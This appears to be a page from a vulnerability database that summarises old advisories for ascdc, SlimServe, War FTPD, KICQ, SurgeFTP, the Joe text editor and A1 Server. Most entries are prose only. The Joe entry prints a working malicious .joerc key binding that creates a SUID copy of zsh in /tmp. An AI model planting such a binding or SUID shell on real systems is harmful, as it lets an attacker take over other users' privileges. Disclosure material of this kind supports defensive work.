Explore Vulnerabilities

Explore all Exploits:

ascdc Local Exploit

A vulnerability in the program could allow elevated privileges on a system with the package installed setuid. Due to insufficient bounds checking, it is possible to execute arbitrary code with the ascdc program. Overflows in the -c, -d, and -m arguments make it possible for a user to overwrite variables on the stack, including the return address, and execute shellcode.

Buffer Overflow in ascdc

A vulnerability in the program ascdc could allow elevated privileges on a system with the package installed setuid. Due to insufficient bounds checking, it is possible to execute arbitrary code with the ascdc program. Overflows in the -c, -d, and -m arguments make it possible for a user to overwrite variables on the stack, including the return address, and execute shellcode.

SlimServ FTPd Directory Traversal Vulnerability

A problem with the SlimSoft FTP daemon allows remote users to traverse directories outside of the ftp root. Due to the insufficient checking of input, it is possible for a user to escape the ftp root directory by using relative paths. By requesting a directory change of "..." (three dots), it is possible to gain access to the root directory of the partition the ftp server is running on, and potentially gain access to sensitive system files.

SlimServe HTTPd Denial of Service Vulnerability

A problem in the handling of HTTP GET requests could allow a remote user to deny service to legitimate users of web services. Upon requesting a long filename from the HTTP server (estimated 80000 characters), the server crashes. Upon ceasing operation, it produces an 'invalid page fault' error. The service will not operate again until SlimServe is manually restarted. It is therefore possible for a malicious remote user to connect to the server and request a long file name, crashing the server, and resulting in a denial of service attack.

Jarle Aase War FTPD Server Directory Traversal Vulnerability

A remote user could gain read access to directories outside of the ftp root in a Jarle Aase War FTPD Server. Once a user is logged into the server, a specially crafted 'dir' command will disclose an arbitrary directory. This vulnerability could allow an attacker to gain read access to various files residing on the target machine.

KICQ Remote Command Execution Vulnerability

KICQ is an ICQ-compatible interactive messaging client for Unix. Versions of KICQ are vulnerable to remote execution of arbitrary commands embedded in URLs. A maliciously-composed URL containing shell metacharacters and shell commands can be sent in an instant message by an attacker. When the KICQ user clicks this link, the hostile code contained in the URL will execute with the privilege level of the user running KICQ.

SurgeFTP Denial of Service Vulnerability

A problem with the SurgeFTP program could allow a denial of service to legitimate users. This is due to the handling of malformed requests made by a client. It is possible to cause the server to cease functioning by logging in and requesting a listing of the root directory first, then a listing of the directory above the root directory. Upon receiving the request, the ftp server resets connections and ceases operating.

Joe Text Editor Arbitrary Command Execution Vulnerability

A problem in the sourcing of the .joerc file could lead to arbitrary execution of commands. By design, joe searches for its configuration (.joerc) file in three different places. These places are the Current Working Directory (CWD), $HOME/.joerc, and /usr/local/lib/joerc. By creating a custom crafted .joerc file in a world writable directory, a person editing a file in the world writable directory would execute arbitrary commands when starting joe. Therefore, it is possible for a user with malicious motives to create custom crafted joerc files in world writable directories, and execute arbitrary commands as other users. This could be done through social engineering, and potentially lead to elevated privileges.

After copying the /usr/local/lib/joerc file to a world writable directory, the following line can be added to create a malicious key binding:

    :def spellfile filt,"cat >ispell.tmp;ispell ispell.tmp </dev/tty>/dev/tty;cat ispell.tmp;/bin/rm ispell.tmp;cp /bin/zsh /tmp/suid; chmod 4755 /tmp/suid",rtn,retype

This will bind the creation of a SUID shell in the /tmp directory to the keys ^[l. This exploit will allow the attacker to assume the identity of the user of joe.

Robin Twombly A1 Server Denial of Service Vulnerability

It is possible for a remote user to cause a denial of service condition in Robin Twombly A1 Server by submitting a specially crafted request via a telnet connection, which could cause the A1 server to crash. A restart of the server is required in order to restore normal functionality.
